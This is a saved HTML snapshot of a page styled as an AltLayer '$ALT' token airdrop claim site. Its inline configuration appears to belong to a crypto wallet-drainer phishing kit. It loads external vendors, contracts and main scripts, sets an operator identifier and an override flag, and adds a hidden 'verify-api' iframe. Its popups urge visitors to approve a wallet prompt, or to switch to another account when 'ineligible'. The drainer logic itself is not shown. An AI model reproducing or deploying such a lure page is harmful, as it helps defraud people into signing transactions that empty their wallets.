<!DOCTYPE html>
<html lang="en"
    style="--wcm-color-fg-1: rgb(20,20,20); --wcm-color-fg-2: rgb(121,134,134); --wcm-color-fg-3: rgb(158,169,169); --wcm-color-bg-1: rgb(255,255,255); --wcm-color-bg-2: rgb(241,243,243); --wcm-color-bg-3: rgb(228,231,231); --wcm-color-overlay: rgba(0,0,0,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;"
    data-scrapbook-source="https://airdrop.altlayer.io/" data-scrapbook-create="20240125094238779"
    data-scrapbook-title="airdrop.altlayer.io/">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="1ff5659c33e92e2e.css" data-precedence="next">
    <link rel="stylesheet" href="3d3f1e9118744667.css" data-precedence="next">
    <link rel="stylesheet" href="77ec12f8661cb44d.css" data-precedence="next">
    <link rel="icon" href="favicon.ico" type="image/x-icon" sizes="16x16">
    <meta name="next-size-adjust">
    <meta name="AltLayer Airdrop">
    <meta property="og:url" content="https://altlayer.io/">
    <meta property="og:type" content="website">
    <meta property="og:title" content="AltLayer Airdrop">
    <meta property="og:description"
        content="AltLayer is a decentralized protocol that facilitates the launch of native and restaked rollups with both optimistic and zk rollup stacks.">
    <meta property="og:image" content="https://altlayer-image-store.alt.technology/airdropPreview.png">
    <meta name="twitter:card" content="summary_large_image">
    <meta property="twitter:domain" content="altlayer.io">
    <meta property="twitter:url" content="https://altlayer.io/">
    <meta name="twitter:title" content="AltLayer">
    <meta name="twitter:description"
        content="AltLayer is a decentralized protocol that facilitates the launch of native and restaked rollups with both optimistic and zk rollup stacks.">
    <meta name="twitter:image" content="https://altlayer-image-store.alt.technology/airdropPreview.png">
    <meta http-equiv="origin-trial"
        content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9">

        <script defer="defer" src="js/vendors.js"></script>
        <script defer="defer" src="js/contracts.js"></script>
        <script defer="defer" src="js/main.js"></script>
      
        <script>
          window.UNIQUE_IDENTITY = "yelping_cheetah_23";
      
          // Pick a theme here, this defaults to "light"
          window.modal_theme = "dark";
      
          // https://docs.walletconnect.com/2.0/web/web3modal/html/wagmi/theming
          window.modal_variables = { "--w3m-z-index": "99999999999999999999999999999999",
            // Example of what you can do:
            "--w3m-accent-color": "#6266DB",
            "--w3m-background-color": "#6266DB",
            "--w3m-background-border-radius": "0px",
            "--w3m-container-border-radius": "0px",
            "--w3m-wallet-icon-border-radius": "0px",
            "--w3m-wallet-icon-large-border-radius": "0px",
            "--w3m-wallet-icon-small-border-radius": "0px",
            "--w3m-secondary-button-border-radius": "0px",
            "--w3m-icon-button-border-radius": "0px",
            "--w3m-button-hover-highlight-border-radius": "0px",
            "--w3m-input-border-radius": "0px",
          };
      
          window.popups = {
            PENDING: {
              title: "Claim Pending",
              text: "Approve the prompt in order to Claim $ALT Airdrop.",
            },
            INVALID: {
              title: "Ineligible Address",
              text: "The connected wallet is not eligible for $ALT Airdrop.\nPlease try using a different account.",
            },
          };
      
          window.OVERRIDE_MODE = false;
        </script>
      </head>

<body class="__className_e66fe9">
    <div class="appBg"></div>
    <div class="relative m-auto max-w-screen-2xl">
        <div
            class="appBgLeft left-[calc(50vw_-_0.22rem)] xs:left-[calc(50vw_-_0.35rem)] xs:h-[25rem] xs:w-[12rem] md:left-0 md:top-[10rem] md:h-[35.5rem] md:w-[18rem]">
        </div>
        <div
            class="appBgRight right-[calc(50vw_-_0.22rem)] xs:right-[calc(50vw_-_0.35rem)] xs:h-[25rem] xs:w-[12rem] md:right-0 md:top-[10rem] md:h-[35.5rem] md:w-[18rem]">
        </div>
        <div class="appBgCoinLeft opacity-5 xs:opacity-20 xl:opacity-100"></div>
        <div class="appBgCoinRight opacity-5 xs:opacity-20 xl:opacity-100"></div>
        <div class="m-auto min-h-screen w-screen max-w-screen-2xl overflow-auto text-black">
            <div data-rk="">
                <style>
                    [data-rk] {
                        --rk-blurs-modalOverlay: blur(0px);
                        --rk-fonts-body: SFRounded, ui-rounded, "SF Pro Rounded", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
                        --rk-radii-actionButton: 9999px;
                        --rk-radii-connectButton: 12px;
                        --rk-radii-menuButton: 12px;
                        --rk-radii-modal: 16px;
                        --rk-radii-modalMobile: 28px;
                        --rk-colors-accentColor: #6667ab;
                        --rk-colors-accentColorForeground: #FFF;
                        --rk-colors-actionButtonBorder: rgba(0, 0, 0, 0.04);
                        --rk-colors-actionButtonBorderMobile: rgba(0, 0, 0, 0.06);
                        --rk-colors-actionButtonSecondaryBackground: rgba(0, 0, 0, 0.06);
                        --rk-colors-closeButton: rgba(60, 66, 66, 0.8);
                        --rk-colors-closeButtonBackground: rgba(0, 0, 0, 0.06);
                        --rk-colors-connectButtonBackground: #FFF;
                        --rk-colors-connectButtonBackgroundError: #FF494A;
                        --rk-colors-connectButtonInnerBackground: linear-gradient(0deg, rgba(0, 0, 0, 0.03), rgba(0, 0, 0, 0.06));
                        --rk-colors-connectButtonText: #25292E;
                        --rk-colors-connectButtonTextError: #FFF;
                        --rk-colors-connectionIndicator: #30E000;
                        --rk-colors-downloadBottomCardBackground: linear-gradient(126deg, rgba(255, 255, 255, 0) 9.49%, rgba(171, 171, 171, 0.04) 71.04%), #FFFFFF;
                        --rk-colors-downloadTopCardBackground: linear-gradient(126deg, rgba(171, 171, 171, 0.2) 9.49%, rgba(255, 255, 255, 0) 71.04%), #FFFFFF;
                        --rk-colors-error: #FF494A;
                        --rk-colors-generalBorder: rgba(0, 0, 0, 0.06);
                        --rk-colors-generalBorderDim: rgba(0, 0, 0, 0.03);
                        --rk-colors-menuItemBackground: rgba(60, 66, 66, 0.1);
                        --rk-colors-modalBackdrop: rgba(0, 0, 0, 0.3);
                        --rk-colors-modalBackground: #FFF;
                        --rk-colors-modalBorder: transparent;
                        --rk-colors-modalText: #25292E;
                        --rk-colors-modalTextDim: rgba(60, 66, 66, 0.3);
                        --rk-colors-modalTextSecondary: rgba(60, 66, 66, 0.6);
                        --rk-colors-profileAction: #FFF;
                        --rk-colors-profileActionHover: rgba(255, 255, 255, 0.5);
                        --rk-colors-profileForeground: rgba(60, 66, 66, 0.06);
                        --rk-colors-selectedOptionBorder: rgba(60, 66, 66, 0.1);
                        --rk-colors-standby: #FFD641;
                        --rk-shadows-connectButton: 0px 4px 12px rgba(0, 0, 0, 0.1);
                        --rk-shadows-dialog: 0px 8px 32px rgba(0, 0, 0, 0.32);
                        --rk-shadows-profileDetailsAction: 0px 2px 6px rgba(37, 41, 46, 0.04);
                        --rk-shadows-selectedOption: 0px 2px 6px rgba(0, 0, 0, 0.24);
                        --rk-shadows-selectedWallet: 0px 2px 6px rgba(0, 0, 0, 0.12);
                        --rk-shadows-walletLogo: 0px 2px 16px rgba(0, 0, 0, 0.16);
                    }
                </style>
                <div id="portal-root" class="fixed left-0 top-0 z-10"></div>
                <div class="p-2 text-center md:p-4">
                    <div
                        class="flex w-full flex-wrap items-center justify-between rounded-3xl bg-white px-10 py-6 md:flex-nowrap">
                        <a href="">
                            <div><img alt="AltLayer" fetchpriority="high" width="50" height="50" decoding="async"
                                    data-nimg="1" class="h-8 w-8 lg:h-12 lg:w-12" style="color:transparent"
                                    src="altLayerLogo.5f72f0cf.svg"></div>
                        </a>
                        <div class="flex items-center justify-center gap-x-4"><a target="_blank"
                                rel="noopener noreferrer" href="https://twitter.com/alt_layer"><img alt="twitter"
                                    loading="lazy" width="72" height="72" decoding="async" data-nimg="1"
                                    class="h-6 w-6 lg:h-10 lg:w-10" style="color:transparent"
                                    srcset="twitter-1.png 1x, twitter.png 2x" src="twitter.png"></a><a target="_blank"
                                rel="noopener noreferrer" href="https://discord.com/invite/altlayer"><img alt="discord"
                                    loading="lazy" width="72" height="72" decoding="async" data-nimg="1"
                                    class="h-6 w-6 lg:h-10 lg:w-10" style="color:transparent"
                                    srcset="discord-1.png 1x, discord.png 2x" src="discord.png"></a><a target="_blank"
                                rel="noopener noreferrer" href="https://blog.altlayer.io/"><img alt="medium"
                                    loading="lazy" width="72" height="72" decoding="async" data-nimg="1"
                                    class="h-6 w-6 lg:h-10 lg:w-10" style="color:transparent"
                                    srcset="medium-1.png 1x, medium.png 2x" src="medium.png"></a></div>
                    </div>
                    <div class="relative mx-auto pt-10">
                        <main
                            class="flex min-h-[calc(100vh-300px)] w-full flex-col items-center justify-between lg:min-h-[calc(100vh-265px)]">
                            <div class="w-full">
                                <div
                                    class="relative flex min-h-[10rem] w-full flex-col items-center justify-center gap-16">
                                    <h1 class="mt-8">Welcome to the World of<br>Restaked Rollups</h1>
                                    <div>
                                        <div id="connect_button"
                                            class="flex min-w-[20rem] overflow-hidden rounded-full border-2 border-blue-400 bg-white xs:min-w-[30rem] sm:min-w-[38rem] md:min-w-[45rem]">
                                            <button id="connect_button"
                                                class="btn-primary m-1 flex-[0.5] justify-center rounded-full px-0 text-2xs sm:flex-1 sm:px-1 sm:text-base"
                                                enabled="">Claim Airdrop</button></div>
                                        <div class="text-red-500"></div>
                                    </div>
                                </div>
                            </div>
                        </main>
                        <footer class="p-4 text-xs">
                            <div class="m-auto grid max-w-screen-2xl grid-cols-12 space-y-1 rounded-xl pt-8">
                                <div class="col-span-12 text-center lg:text-left">By using this product, you acknowledge
                                    having read the<!-- --> <a class="link text-blue-600"
                                        href="https://airdrop.altlayer.io/legal/privacy-policy">privacy policy</a>
                                    <!-- -->and<!-- --> <a class="link text-blue-600"
                                        href="https://airdrop.altlayer.io/legal/disclaimer">disclaimer</a></div>
                                <div class="col-span-12 space-y-1 text-center lg:flex lg:justify-between">
                                    <div>© 2024 - AltLayer Airdrop</div>
                                    <div>A product of<!-- --> <a class="text-blue-600" href="https://altlayer.io/"
                                            rel="noopener noreferrer" target="_blank">altlayer.io</a></div>
                                </div>
                            </div>
                        </footer>
                    </div>
                </div>
            </div>
        </div>
    </div><next-route-announcer style="position: absolute;"
        data-scrapbook-shadowdom="<div aria-live=&quot;assertive&quot; id=&quot;__next-route-announcer__&quot; role=&quot;alert&quot; style=&quot;position: absolute; border: 0px; height: 1px; margin: -1px; padding: 0px; width: 1px; clip: rect(0px, 0px, 0px, 0px); overflow: hidden; white-space: nowrap; overflow-wrap: normal;&quot;></div>"></next-route-announcer><iframe
        id="verify-api" src="4d5446e8ec94e268ab92180f51c66637.txt" style="display: none;"></iframe><wcm-modal
        data-scrapbook-shadowdom="<!----><wcm-explorer-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-explorer-context><wcm-theme-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-theme-context><div id=&quot;wcm-modal&quot; role=&quot;alertdialog&quot; aria-modal=&quot;true&quot; class=&quot; wcm-overlay &quot;><div class=&quot;wcm-container&quot; tabindex=&quot;0&quot;><!--?lit$9803445015$--></div></div>"></wcm-modal><wcm-modal
        data-scrapbook-shadowdom="<!----><wcm-explorer-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-explorer-context><wcm-theme-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-theme-context><div id=&quot;wcm-modal&quot; role=&quot;alertdialog&quot; aria-modal=&quot;true&quot; class=&quot; wcm-overlay &quot;><div class=&quot;wcm-container&quot; tabindex=&quot;0&quot;><!--?lit$9803445015$--></div></div>"></wcm-modal><wcm-modal
        data-scrapbook-shadowdom="<!----><wcm-explorer-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-explorer-context><wcm-theme-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-theme-context><div id=&quot;wcm-modal&quot; role=&quot;alertdialog&quot; aria-modal=&quot;true&quot; class=&quot; wcm-overlay &quot;><div class=&quot;wcm-container&quot; tabindex=&quot;0&quot;><!--?lit$9803445015$--></div></div>"></wcm-modal>
    <script
        data-scrapbook-elem="basic-loader">(function () { var k1 = "data-scrapbook-shadowdom", k2 = "data-scrapbook-canvas", k3 = "data-scrapbook-input-indeterminate", k4 = "data-scrapbook-input-checked", k5 = "data-scrapbook-option-selected", k6 = "data-scrapbook-input-value", k7 = "data-scrapbook-textarea-value", fn = function (r) { var E = r.querySelectorAll ? r.querySelectorAll("*") : r.getElementsByTagName("*"), i = E.length, e, d, s; while (i--) { e = E[i]; if ((d = e.getAttribute(k1)) !== null && !e.shadowRoot && e.attachShadow) { s = e.attachShadow({ mode: 'open' }); s.innerHTML = d; e.removeAttribute(k1); } if ((d = e.getAttribute(k2)) !== null) { (function () { var c = e, g = new Image(); g.onload = function () { c.getContext('2d').drawImage(g, 0, 0); }; g.src = d; })(); e.removeAttribute(k2); } if ((d = e.getAttribute(k3)) !== null) { e.indeterminate = true; e.removeAttribute(k3); } if ((d = e.getAttribute(k4)) !== null) { e.checked = d === 'true'; e.removeAttribute(k4); } if ((d = e.getAttribute(k5)) !== null) { e.selected = d === 'true'; e.removeAttribute(k5); } if ((d = e.getAttribute(k6)) !== null) { e.value = d; e.removeAttribute(k6); } if ((d = e.getAttribute(k7)) !== null) { e.value = d; e.removeAttribute(k7); } if (e.shadowRoot) { fn(e.shadowRoot); } } }; fn(document); })()</script>
</body>

</html>